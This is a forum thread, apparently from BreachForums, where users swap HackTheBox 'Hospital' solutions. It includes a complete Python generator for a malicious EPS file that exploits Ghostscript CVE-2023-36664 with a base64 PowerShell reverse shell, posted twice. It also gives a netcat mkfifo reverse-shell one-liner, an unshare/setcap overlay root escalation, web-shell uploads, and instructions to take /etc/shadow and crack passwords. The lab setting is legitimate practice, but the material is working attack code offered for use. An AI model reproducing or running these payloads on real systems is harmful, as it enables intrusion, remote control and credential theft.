HTB - Hospital
by take1312 - Saturday November 18, 2023 at 06:51 PM
#41
can't run winpeas any hints for admin
Reply
#42
(11-19-2023, 04:55 AM)Miranda0315 Wrote:
(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin

have you found a way to administrator?
you can write in a special folder and you gain admin
Reply
#43
(11-19-2023, 06:23 AM)hcker01 Wrote:
(11-19-2023, 04:55 AM)Miranda0315 Wrote:
(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin

have you found a way to administrator?
you can write in a special folder and you gain admin

which folder?
Reply
#44
revised the exploit to be easier for the scrubs Big Grin

[Image: nEFDZy8.png]

import argparse import os import re import subprocess import base64 def get_user_input():     ip_command = "ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1"     ip = subprocess.check_output(ip_command, shell=True).decode().strip()     print(f"Detected Tun0 IP: {ip}")     user_ip = input("Enter to accept IP or type new IP: ")     ip = user_ip if user_ip else ip     port = input("Enter NetCat connect back port: ")     filename = input("Enter filename: ")     return ip, port, filename def generate_payload(ip, port):     payload = f"""$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(( $i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()"""     base64_payload = base64.b64encode(payload.encode('utf-16le')).decode()     final_payload = f"powershell -e {base64_payload}"     escaped_payload = f"(%pipe%{final_payload}) (w) file /DCTDecode filter"     return escaped_payload def generate_payload_file(filename, payload):     content = f"""%!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: 0 0 300 300 %%Title: Malicious EPS /Times-Roman findfont 24 scalefont setfont newpath 50 200 moveto (Sup breachforums!) show newpath 30 100 moveto 60 230 lineto 90 100 lineto stroke {payload} showpage"""     filename = filename + '.eps'     with open(filename, 'w') as file:         file.write(content) def main():     ip, port, filename = get_user_input()     payload = generate_payload(ip, port)     generate_payload_file(filename, payload)     print(f"\n[+] Generated malicious .eps file: {filename}.eps")     print(f"[+] Popping your courtesy netcat shell: {ip} -lvnp {port}")     print(f"[+] Log into RoundCubeMail and reply to Dr Brown's email, \n    attach {filename}.eps and send. Rev Shell takes a few seconds :)")     command = f'qterminal -e "bash -c \'nc -lvnp {port}; exec bash\'"'     subprocess.Popen(command, shell=True) if __name__ == "__main__":     main()
Reply
#45
(11-19-2023, 01:32 AM)take1312 Wrote:
(11-19-2023, 01:29 AM)Miranda0315 Wrote:
(11-19-2023, 01:25 AM)Miranda0315 Wrote:
(11-19-2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:

upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;

setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'

check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/

get /etc/shadow and creck drwilliams password

use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password

read the mail in the inbox

use this exploit https://github.com/jakabakos/CVE-2023-36...-injection

to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag

root can you find out yourself easily

That's awsome!!
I used the cve and created a .esp file.
python3 exploit.py --generate --revshell -ip 10.10.14.8 -port 4444 --filename good --extension eps
Then, reply the eamil. but did not get the reverse shell. did I do anything wrong??
I know the reason now LOL
Thank you

python3 CVE_2023_36664_exploit.py --inject --payload " payloadhere" --filename file.eps

i used powershell3 base64
This one worked for me Smile

(11-19-2023, 07:49 AM)chillywilly Wrote: revised the exploit to be easier for the scrubs Big Grin

[Image: nEFDZy8.png]

import argparse import os import re import subprocess import base64 def get_user_input():     ip_command = "ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1"     ip = subprocess.check_output(ip_command, shell=True).decode().strip()     print(f"Detected Tun0 IP: {ip}")     user_ip = input("Enter to accept IP or type new IP: ")     ip = user_ip if user_ip else ip     port = input("Enter NetCat connect back port: ")     filename = input("Enter filename: ")     return ip, port, filename def generate_payload(ip, port):     payload = f"""$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(( $i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()"""     base64_payload = base64.b64encode(payload.encode('utf-16le')).decode()     final_payload = f"powershell -e {base64_payload}"     escaped_payload = f"(%pipe%{final_payload}) (w) file /DCTDecode filter"     return escaped_payload def generate_payload_file(filename, payload):     content = f"""%!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: 0 0 300 300 %%Title: Malicious EPS /Times-Roman findfont 24 scalefont setfont newpath 50 200 moveto (Sup breachforums!) show newpath 30 100 moveto 60 230 lineto 90 100 lineto stroke {payload} showpage"""     filename = filename + '.eps'     with open(filename, 'w') as file:         file.write(content) def main():     ip, port, filename = get_user_input()     payload = generate_payload(ip, port)     generate_payload_file(filename, payload)     print(f"\n[+] Generated malicious .eps file: {filename}.eps")     print(f"[+] Popping your courtesy netcat shell: {ip} -lvnp {port}")     print(f"[+] Log into RoundCubeMail and reply to Dr Brown's email, \n    attach {filename}.eps and send. Rev Shell takes a few seconds :)")     command = f'qterminal -e "bash -c \'nc -lvnp {port}; exec bash\'"'     subprocess.Popen(command, shell=True) if __name__ == "__main__":     main()

Good stuff sir Cool
Reply
#46
(11-19-2023, 09:00 AM)kayiz113987 Wrote:
(11-19-2023, 08:54 AM)Miranda0315 Wrote:
(11-19-2023, 08:47 AM)kayiz113987 Wrote:
(11-19-2023, 08:14 AM)Miranda0315 Wrote:
(11-19-2023, 08:06 AM)kayiz113987 Wrote: Can anyone help me to Administrator? Stuck with that :v
Hint is using RDP Smile)) but i think u need revert machine before using it Smile))

same. they said the administrator is easy to find. but I cannot. sad

I got it, it not unattended -> very easy :3

(11-19-2023, 08:14 AM)Miranda0315 Wrote:
(11-19-2023, 08:06 AM)kayiz113987 Wrote: Can anyone help me to Administrator? Stuck with that :v

same. they said the administrator is easy to find. but I cannot. sad

I got it, it not unattended -> very easy :3

where? LOL

Using RPC with normal user Smile))


Same. Stuck on getting Administrator I am not very good with Windows Priv Esc
Reply
#47
(11-19-2023, 07:49 AM)m1lk Wrote:
(11-19-2023, 06:23 AM)hcker01 Wrote:
(11-19-2023, 04:55 AM)Miranda0315 Wrote:
(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin

have you found a way to administrator?
you can write in a special folder and you gain admin

which folder?
xampp/htdocs
Reply
#48
(11-19-2023, 11:21 AM)hcker01 Wrote:
(11-19-2023, 07:49 AM)m1lk Wrote:
(11-19-2023, 06:23 AM)hcker01 Wrote:
(11-19-2023, 04:55 AM)Miranda0315 Wrote:
(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin

have you found a way to administrator?
you can write in a special folder and you gain admin

which folder?
xampp/htdocs

Can you detaille for administrator please
Reply
#49
(11-19-2023, 12:14 PM)nenandjabhata Wrote:
(11-19-2023, 11:21 AM)hcker01 Wrote:
(11-19-2023, 07:49 AM)m1lk Wrote:
(11-19-2023, 06:23 AM)hcker01 Wrote:
(11-19-2023, 04:55 AM)Miranda0315 Wrote: have you found a way to administrator?
you can write in a special folder and you gain admin

which folder?
xampp/htdocs

Can you detaille for administrator please

Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there 
acess it
recieve root shell
Reply
#50
(11-19-2023, 12:42 PM)take1312 Wrote:
(11-19-2023, 12:14 PM)nenandjabhata Wrote:
(11-19-2023, 11:21 AM)hcker01 Wrote:
(11-19-2023, 07:49 AM)m1lk Wrote:
(11-19-2023, 06:23 AM)hcker01 Wrote: you can write in a special folder and you gain admin

which folder?
xampp/htdocs

Can you detaille for administrator please

Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there 
acess it
recieve root shell

I became administrator, but what in the machine indicates that I would become admin if I put a shell in that folder?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,859 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,326 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,489 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,312 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,610 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)